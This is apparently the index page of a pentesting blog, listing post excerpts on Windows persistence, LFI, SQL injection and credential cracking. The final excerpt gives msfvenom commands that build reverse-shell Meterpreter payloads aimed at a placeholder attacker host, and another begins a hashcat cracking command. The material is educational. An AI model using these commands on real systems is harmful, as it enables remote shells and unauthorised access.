- Pentesting
- Categories
-
Feb 25, 2020
Persistence via Shims
Application Shimming This’ll be a quick post on the Windows Persistence method of Application Shimming - T1138. Microsoft developed a method for users/engineers to create custom fixes for application compatibility...
Read More -
Nov 23, 2019
Persistence via IFEO
Image File Execution Options This is a quick post on maintaining persistence with Image File Execution Options. IFEO is a built-in windows functionality for attaching debugger processes to other arbitrary...
Read More -
Nov 6, 2019
Part 2: Living Off The Land
Intro Another post dedicated to showcase the naturally aspirated aproach to execute, persist and laterally move throughout a Windows network. In this post we’ll dive into additional techniques, from utilizing...
Read More -
Aug 31, 2019
Sentrifugo Exploits
Intro Sentrifugo is a free and open-source Human Resource Management System (HRMS) primarily written in PHP with many user controlled features. After doing some research on version 3.2, I discovered...
Read More -
Jun 16, 2019
WMI Persistence
WMI Basics WMI is a core functionality of the Windows OS that has been part of Windows for a long time (see also: DCOM and CIM). From Microsoft: “Windows Management...
Read More -
Mar 12, 2019
DLL Hijacking
DLL Hijacking & Ghidra DLL Hijacking simply executes an external library (dll) a Portable Executable(PE) was not intended to run. Due to DLL search order, one could implant a binary...
Read More -
Jan 29, 2019
WebGoat 8 Install
Install WebGoat on Ubuntu 18.04 Checkout the Official OWASP Documentaiton first, and use this as a supplementary guide during install. After a fresh install of Ubuntu Server 18.04 use sudo...
Read More -
Oct 20, 2018
Living Off the Land
With Windows Binaries A naturally-aspirated approach focusing on the use of native built-in binaries to exploit and persist on target systems. Avoiding detection is a constant battle, so what’s the...
Read More -
Sep 2, 2018
FI Cyberspace Scan
Cyberscan Local File Inclusion CLI tool written in Python to speed up LFI checks. Similar to using Burp or ZAP, but less bulky and resource intensive. Plus it’s in color...
Read More -
Aug 4, 2018
SQLi
SQL Injection 101 Generally, the most common web application security risk is injection and has been in OWASP Top 10 since its inception. SQL injection is a category that falls...
Read More -
Jul 28, 2018
Hack the Helpers
Netsh DLL Helpers The native Microsoft command-line utility NetShell is an extensible tool for admins, pentesters and defenders. See a brief write-up of mine on its offensive functionality One added...
Read More -
Jul 14, 2018
Intro to Empire
Crush the Rebellion Empire is a outstanding post-exploitation framework for Windows targets. This post will go through the basics - from app install to creating a backdoor. I’d recommend grabbing...
Read More -
Jul 8, 2018
Metasploitable 3 Install
Install Metasploitable Here’s the process to install metasploitable 3 on Windows and Kali Linux. I had a hell of a time getting it working properly, so decided to throw my...
Read More -
Jun 27, 2018
Private-i
Linux PrivEsc Private-i Linux Private-i is a custom enumeration tool to assist in privilege escalation by automating tasks. This post is a simple quick overview, checkout the github repo to...
Read More -
May 19, 2018
Log Poisoning - LFI to RCE
LFI to RCE Converting local file inclusion to remote command can be tricky or even impossible in many cases. Depending on system configurations, you may be able to pass arbitrary...
Read More -
Apr 19, 2018
Cracking Creds
Cracking You’ve found a hash and now you want to crack it? First, it’s important to find what sort of hash type you’re working with. You may know from experience...
Read More -
Apr 11, 2018
Netshell
Netshell in a Nutshell A versatile built-in Windows network utility native to Windows 7 and above. If you’ve compromised a windows target and don’t have a fancy meterpreter shell, netsh...
Read More -
Apr 4, 2018
LFI & RFI
LFI Quick Guide If you’re relatively new to pentesting the whole LFI concept can be a bit confusing, especailly when trying to convert that LFI vulnerability to shell. Below is...
Read More -
Mar 10, 2018
ZAP Quick Guide
OWASP Zed Attack Proxy OWASP ZAP is another excellent tool for pentesting web applications. It’s installed by default within Kali and is completely free. It’s not necessarily a mass vulnerability...
Read More -
Feb 27, 2018
Notes Dump
Personal notes dump from testing on vulnhub machines and getting through the OSCP. Anything explicitly from OSCP lab machines have been removed. ************************************* Hashcat ************************************* hashcat64.exe -m 1000 -a 0...
Read More -
Feb 10, 2018
MSF Venom Quick Guide
Generation Commands Linux Staged Meterpreter msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf Inline Meterpreter msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf Windows Executable with Meterpreter msfvenom...
Read More